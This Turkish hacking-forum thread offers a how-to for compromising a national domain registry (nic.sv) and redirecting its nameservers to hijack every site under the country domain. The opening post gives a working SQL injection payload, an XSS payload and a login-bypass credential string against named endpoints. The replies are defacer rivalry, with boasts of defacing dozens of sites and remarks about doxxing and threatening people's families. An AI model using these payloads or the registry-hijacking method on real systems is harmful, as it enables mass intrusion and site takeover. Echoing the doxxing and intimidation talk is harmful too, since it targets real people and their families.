Tek Seferde Binlerce Site Hackle [Nic Hacklemek] (1 Viewer)

Credits
725
Rating - 0%
Beyler Konuda Dediğim Gibi Bir Siteyi Çeşitli Yollarla Hacklersin;
> Sitedeki Zaafiyetler (Sadece O Site Ve Rootlarsan Sw)
> Nic Teki Zaafiyet ( O Ülkedeki Bütün Siteler )
> İcann , İana Zaafiyet ( Bütün İnternet Siteleri )

Ben Size Nic Senaryosundan Bahsedeyim ,
Nic leri Hackleyip Yönlendirme Atarak O Nicin Bütün Sitelerini Hacklersiniz (Facebook vs) Tek Seferde 30 bin Site!
Türkcrew De Olanlar Bilir Az Nic Hacklenmedi Hackleme Yöntemiziz [ Sql (Nic.sv) , Server Rootlama (Nic.com.be) ] ve bazı lfi açıkları. oxy daha iyi bilir. neyse
Genelde Lfi - Rfi - Sql Açıkları Olur Nic Sitelerinde.
Nic Hackledikten Sonra Domain Regs . Bölümünden Liste Tiklayin ve orda Bilgi Ekranı Açılacak Ve Nsleri Güncelleyin Örnek Bilgiler (https://i.hizliresim.com/Lln971.png)
Yönelndirmeyi kendi Hostunuza Yapin Ve İstediğiniz Siteyi Hackleyin Bu Kadar.
Nic Konusunda Türkiyenin En Taninan İsmi f0rtys3v3n Yani Emrahtir Sonra Tc Ekibi Gelir

Vuln : nic.sv
+Sql ; nic.sv/ajax/procesa.php (dominio=e.sv'/**/AND/**/'000SYDL'%3d'000SYDL&key=getConsulta)

+Css : nic.sv//ajax/procesa.php (dominio=e&key=Buscar&nivel=.sv'%22()%26%25<ScRiPt%20>prompt(931263)</ScRiPt>)

+Direkt Login Bypass ;
http://www.nic.sv/t_login.php
K.adi : '=' 'or'
Şifre : '=' 'or'

Kolay Gelsin Beyler

Not
İcann 'da da Sql Açığı Var Fakat Bulan Kişi Paylaşmıyor (eyupcelik - Osman Güdendede)

Hacklenen Bazı Niclere (https://rootdevilz.wordpress.com/) Ulaşa Bilirsiniz ;)

Diğer Makalem (Tek Seferde 1m Site Hackle)https://www.spyhackerz.com/forum/threads/tek-seferde-1m-site-hackle.16926/

Last edited:
D

delete.9999

TurkCrew zamanı com.mw yi hackleyip tüm sanal aleme dağıttığımız zaman basıp bize laf yapan bebeler aklıma geliyor bir çok nic lere girip bastığımızda yediremeyip çamur atıyorlardı burdan hepsinin anasını terzi gibi dikiyim

Quaxer

BIRAKTIM
Credits
20
Rating - 0%
TurkCrew zamanı com.mw yi hackleyip tüm sanal aleme dağıttığımız zaman basıp bize laf yapan bebeler aklıma geliyor bir çok nic lere girip bastığımızda yediremeyip çamur atıyorlardı burdan hepsinin anasını terzi gibi dikiyim
Hacı kızmada bir şey söylüyecem her 10 postundan 11'i tc ile alakalı :D

Credits
725
Rating - 0%
Aynen Sadece Com.mw mi :)) , icraat lerimiz büyük oldu fakat zamanı gelince tekrarda döne biliriz. (Anonim birisi )

D

delete.9999

Şu yazacağım da TC ile alakalı bu konuyu açan arkadaş turkcrew de olanlar bilir nic hackleme yöntemimiz demiş de sen kimsin turkcrew olarak yönetimde 5 6 kişi vardık senide forumda hiç hatırlamıyorum ben

Credits
725
Rating - 0%
Şu yazacağım da TC ile alakalı bu konuyu açan arkadaş turkcrew de olanlar bilir nic hackleme yöntemimiz demiş de sen kimsin turkcrew olarak yönetimde 5 6 kişi vardık senide forumda hiç hatırlamıyorum ben
Bilmem Haxor Hacklenmeden Öncede Ben vardım timde Bizim tim adına Şu Fake crack yapılıncada ama gizli kalmayı seviyorum (
) çok gülmüştük seninle :))

hax0r.tr

<?php dAyı ?>
Credits
0
Rating - 0%
Bilmem Haxor Hacklenmeden Öncede Ben vardım timde Bizim tim adına Şu Fake crack yapılıncada ama gizli kalmayı seviyorum (
) çok gülmüştik seninle :))

1 dakika buraya ben el atıyorum.
1. Beni kimse hacklemdi bunu sakın unutmayın o muhterem picine şifremi ben verdim bunun sebebi ise benim Ailemi sanala Ifşa etmekle tehtit etti fakat bunun karşılığında kendisi çok pişman oldu.
2. Bizzat ben TC Kurucusuyum ve TC asla kurulmayacak bu böyle bilinsin.
3. Sen kimsin? Ne ayaksın?

D

delete.9999

Birader kimsin nesin tanımam etmem lakin turkcrew adını yada bizim ekipten herhangi birinin adını kullanıp da birşeyler elde etmek istiyorsan berbat yanılırsın bunun karşılığınıda misliyle alırsın aklında bulunsun

Credits
725
Rating - 0%
1 dakika buraya ben el atıyorum.
1. Beni kimse hacklemdi bunu sakın unutmayın o muhterem picine şifremi ben verdim bunun sebebi ise benim Ailemi sanala Ifşa etmekle tehtit etti fakat bunun karşılığında kendisi çok pişman oldu.
2. Bizzat ben TC Kurucusuyum ve TC asla kurulmayacak bu böyle bilinsin.
3. Sen kimsin? Ne ayaksın?
Biliyorum Muhterem Benide İfşalamıştı Aynı Yöntemle tehdit etmişti bende işe yaramadı demek sende işe yaradı

Credits
725
Rating - 0%
Birader kimsin nesin tanımam etmem lakin turkcrew adını yada bizim ekipten herhangi birinin adını kullanıp da birşeyler elde etmek istiyorsan berbat yanılırsın bunun karşılığınıda misliyle alırsın aklında bulunsun
Ben Tc ekibi ile ilgili hiç paylaşım yapmadım ve isimlerini kullamadım ? Sadece Sanalda en iyi Tc geçti dedim? , fakat benim kim olduğum önemli değil mazimiz eskide kaldı ...

hax0r.tr

<?php dAyı ?>
Credits
0
Rating - 0%
Ben 58 Sitelerine Bastım Acımadım benden dahamı iyi intikam aldın ? (Moruzayı zor kurtardı 2 hafta açmadi siteyi)
bunlar sadece arşivimdekiler ,

byumut.kim
Önemli olan sitesine basmak değil, önemli olan Ailesi ile vurmak:)

hax0r.tr

<?php dAyı ?>
Credits
0
Rating - 0%
Ben 58 Sitelerine Bastım Acımadım benden dahamı iyi intikam aldın ? (Moruzayı zor kurtardı 2 hafta açmadi siteyi)
bunlar sadece arşivimdekiler ,

byumut.kim
Önemli olan sitesine basmak değil, önemli olan Ailesi ile vurmak:)

Users who are viewing this thread